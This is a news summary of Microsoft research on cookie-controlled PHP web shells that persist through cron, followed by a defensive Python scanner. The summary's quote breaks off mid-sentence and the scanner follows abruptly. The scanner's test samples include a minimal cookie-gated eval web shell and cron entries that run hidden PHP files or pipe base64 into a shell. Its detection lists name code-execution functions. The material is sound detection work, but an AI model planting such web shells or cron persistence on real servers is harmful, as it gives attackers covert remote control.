Apr 03, 2026 • The Hacker News
Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers
Executive Summary
Microsoft Defender Security Research Team has identified a sophisticated web shell technique where threat actors use HTTP cookies as a covert control channel for PHP-based web shells on Linux servers. Unlike traditional web shells that expose commands via URL parameters, these malicious payloads remain hidden by requiring specific cookie values to trigger execution. The threat actors achieve persistence by scheduling the web shells through cron jobs on compromised systems. This approach enables remote code execution while evading standard detection methods that monitor URL-based command patterns. Organizations running PHP applications on Linux servers should implement robust input validation, monitor for suspicious cookie usage patterns, audit cron job configurations, and deploy web application firewalls to detect anomalous traffic indicative of this stealthy attack vector.
Summary
Threat actors are increasingly using HTTP cookies as a control channel for PHP-based web shells on Linux servers to achieve remote code execution, according to findings from the Microsoft Defender Security Research Team. "Instead of exposing command execution through URL parameters or request bodies, these web shells rely on threat actor-supplied cookie values to gate execution,
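The two checks the summary recommends, auditing PHP sources for cookie-gated execution and reviewing cron entries for scheduled interpreters, can be approximated with a small static scanner. The following Python is an added example written for this page; it is not Microsoft's tooling or detection logic, the PHP snippet and crontab lines it scans are constructed samples, and the path and sink lists are assumptions a defender would tune for their own environment.

```python
import re
from dataclasses import dataclass
from typing import List

# PHP functions that execute code or shell commands (the "sinks" a web shell needs).
DANGEROUS_SINKS = (
    "eval", "assert", "system", "exec", "shell_exec", "passthru",
    "popen", "proc_open", "create_function",
)

# Cookie-derived input, the "source" the described web shells rely on.
SOURCE_RE = re.compile(r"\$_COOKIE\b|\$_SERVER\s*\[\s*['\"]HTTP_COOKIE['\"]\s*\]")
SINK_RE = re.compile(r"\b(" + "|".join(DANGEROUS_SINKS) + r")\s*\(", re.IGNORECASE)
# An if-condition that tests a cookie value: the gating behaviour the report describes.
COOKIE_GATE_RE = re.compile(r"\bif\s*\([^)]*\$_COOKIE[^)]*\)")

# Cron heuristics (assumed locations; adjust to the server's real web roots).
WEB_OR_TMP_PATH_RE = re.compile(r"/(var/www|srv|tmp|dev/shm|var/tmp)/\S*")
CRON_EXEC_RE = re.compile(r"\b(php|curl|wget|bash|sh|python\d?)\b")
B64_RE = re.compile(r"base64\s*(-d|--decode)|base64_decode", re.IGNORECASE)
# Five schedule fields (or an @keyword) followed by the command.
CRON_LINE_RE = re.compile(r"^\s*(@\w+|(\S+\s+){5})(.*)$")


@dataclass
class Finding:
    path: str
    line: int
    severity: str
    reason: str


def scan_php_source(path: str, source: str) -> List[Finding]:
    """Flag cookie-gated conditionals and execution sinks fed by cookie data."""
    findings: List[Finding] = []
    lines = source.splitlines()
    reads_cookie = any(SOURCE_RE.search(t) for t in lines)
    for i, text in enumerate(lines, 1):
        if COOKIE_GATE_RE.search(text):
            findings.append(Finding(path, i, "high", "cookie value gates a conditional"))
        m = SINK_RE.search(text)
        if m:
            sink = m.group(1).lower()
            if SOURCE_RE.search(text):
                findings.append(Finding(path, i, "high", f"{sink}() receives cookie-derived input"))
            elif reads_cookie:
                findings.append(Finding(path, i, "medium", f"{sink}() in a file that reads cookies"))
    return findings


def audit_crontab(text: str) -> List[Finding]:
    """Flag cron entries that run interpreters against web-root/temp paths or decode base64."""
    findings: List[Finding] = []
    for i, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_LINE_RE.match(line)
        if not m:
            continue
        command = m.group(3).strip()
        reasons = []
        if WEB_OR_TMP_PATH_RE.search(command) and CRON_EXEC_RE.search(command):
            reasons.append("interpreter run against a web-root or temp path")
        if B64_RE.search(command):
            reasons.append("base64 decoding in a scheduled command")
        if reasons:
            findings.append(Finding("crontab", i, "high", "; ".join(reasons)))
    return findings


# Constructed sample: a file that only executes when a specific cookie value is present.
SAMPLE_PHP = """<?php
// Constructed sample: looks like a settings include, but executes on a cookie match.
$cfg = ["theme" => "default"];
if (isset($_COOKIE["sess_tag"]) && $_COOKIE["sess_tag"] === "f7a1") {
    @eval(base64_decode($_COOKIE["payload"]));
}
echo $cfg["theme"];
"""

# Constructed sample: legitimate cookie use (a language preference) with no sink.
BENIGN_PHP = """<?php
$lang = isset($_COOKIE["lang"]) ? $_COOKIE["lang"] : "en";
echo htmlspecialchars($lang);
"""

# Constructed sample crontab; the base64 blob is a placeholder, not real content.
SAMPLE_CRON = """# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/bin/php /var/www/html/wp-content/uploads/.cache.php >/dev/null 2>&1
@reboot /usr/bin/php /tmp/.x/run.php
*/10 * * * * echo BASE64_PLACEHOLDER | base64 -d | sh
"""

if __name__ == "__main__":
    for f in scan_php_source("uploads/.cache.php", SAMPLE_PHP) + audit_crontab(SAMPLE_CRON):
        print(f"[{f.severity}] {f.path}:{f.line} {f.reason}")
```

The source scan deliberately separates a cookie-tested `if` from a sink fed by cookie data, since a benign application may do the first (feature flags, language selection) but almost never the second; reviewing the "high" findings first keeps the noise manageable. The cron audit is a starting point only: entries that call an interpreter on a file under an upload or temp directory, or that decode base64 inline, are worth a manual look, and real deployments should also diff user crontabs, `/etc/cron.d` and systemd timers against a known-good baseline.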